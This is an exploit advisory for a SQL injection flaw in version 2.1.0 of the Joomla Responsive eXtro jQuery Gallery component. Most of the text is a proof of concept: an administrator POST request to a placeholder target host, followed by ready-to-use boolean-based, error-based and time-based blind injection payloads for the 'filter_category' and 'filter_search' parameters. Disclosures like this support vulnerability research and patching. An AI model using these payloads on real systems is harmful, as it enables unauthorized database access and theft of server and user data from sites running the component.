# Exploit Title: Joomla Component Responsive eXtro jQuery Gallery 2.1.0 - 'filter_category' SQL Injection
# Dork: N/A
# Date: 2018-10-25
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Contact: https://pentest.com.tr
# Vendor Homepage: https://extro.media/
# Software Link: https://demo.extro.media/responsive-joomla-extensions-en/responsive-gallery
# Version: 2.1.0
# Category: Webapps
# Tested on: Kali linux
# Description : An attacker can execute SQL commands through parameters that contain vulnerable.
# An authorized user can use the filtering feature and can fully authorize
# the database or other server informations.
# 'filter_category' and 'filter_search' parameters have the same vulnerable.
# PoC : SQLi :
POST /administrator/index.php?option=com_emgallery&view=emgallery HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer:
https://TARGET/administrator/index.php?option=com_emgallery
Cookie: 2e7fc5dc4e4ce76c3319e1db921484ac=eqgcirsi6m53s6vbi7bbgng1n5;
48bd4f2f65b6c84d32f8704444f9b24c=pmt3k8q4qv1o7of19d2cjo6p21
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 151
filter_category=0&filter_search=&list%5Blimit%5D=100&limitstart=0&task=&boxchecked=0&filter_order=&filter_order_Dir=&e0e53a883a46b480b689e343b1c8a401=1
# Parameter: filter_category (POST)
# Type: boolean-based blind
# Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
# Payload:
filter_category=-7022 OR 5787=5787#&filter_search=&list%5Blimit%5D=100&limitstart=0&task=&boxchecked=0&filter_order=&filter_order_Dir=&e0e53a883a46b480b689e343b1c8a401=1
# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
# Payload:
filter_category=1 AND (SELECT 5756 FROM(SELECT COUNT(*),CONCAT(0x7162706271,(SELECT(ELT(5756=5756,1))),0x7170706271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&filter_search=&list%5Blimit%5D=100&limitstart=0&task=&boxchecked=0&filter_order=&filter_order_Dir=&e0e53a883a46b480b689e343b1c8a401=1
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind
# Payload:
filter_category=1 AND SLEEP(5)&filter_search=&list%5Blimit%5D=100&limitstart=0&task=&boxchecked=0&filter_order=&filter_order_Dir=&e0e53a883a46b480b689e343b1c8a401=1
# Parameter: filter_search (POST)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
# Payload:
filter_category=0&filter_search=" AND 8748=8748#&list%5Blimit%5D=100&limitstart=0&task=&boxchecked=0&filter_order=&filter_order_Dir=&e0e53a883a46b480b689e343b1c8a401=1
# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
# Payload:
filter_category=0&filter_search=" AND (SELECT 2429 FROM(SELECT COUNT(*),CONCAT(0x71766b7671,(SELECT(ELT(2429=2429,1))),0x71627a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)--zyPZ&list%5Blimit%5D=100&limitstart=0&task=&boxchecked=0&filter_order=&filter_order_Dir=&e0e53a883a46b480b689e343b1c8a401=1
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind
# Payload:
filter_category=0&filter_search=" AND SLEEP(5)--fDVO&list%5Blimit%5D=100&limitstart=0&task=&boxchecked=0&filter_order=&filter_order_Dir=&e0e53a883a46b480b689e343b1c8a401=1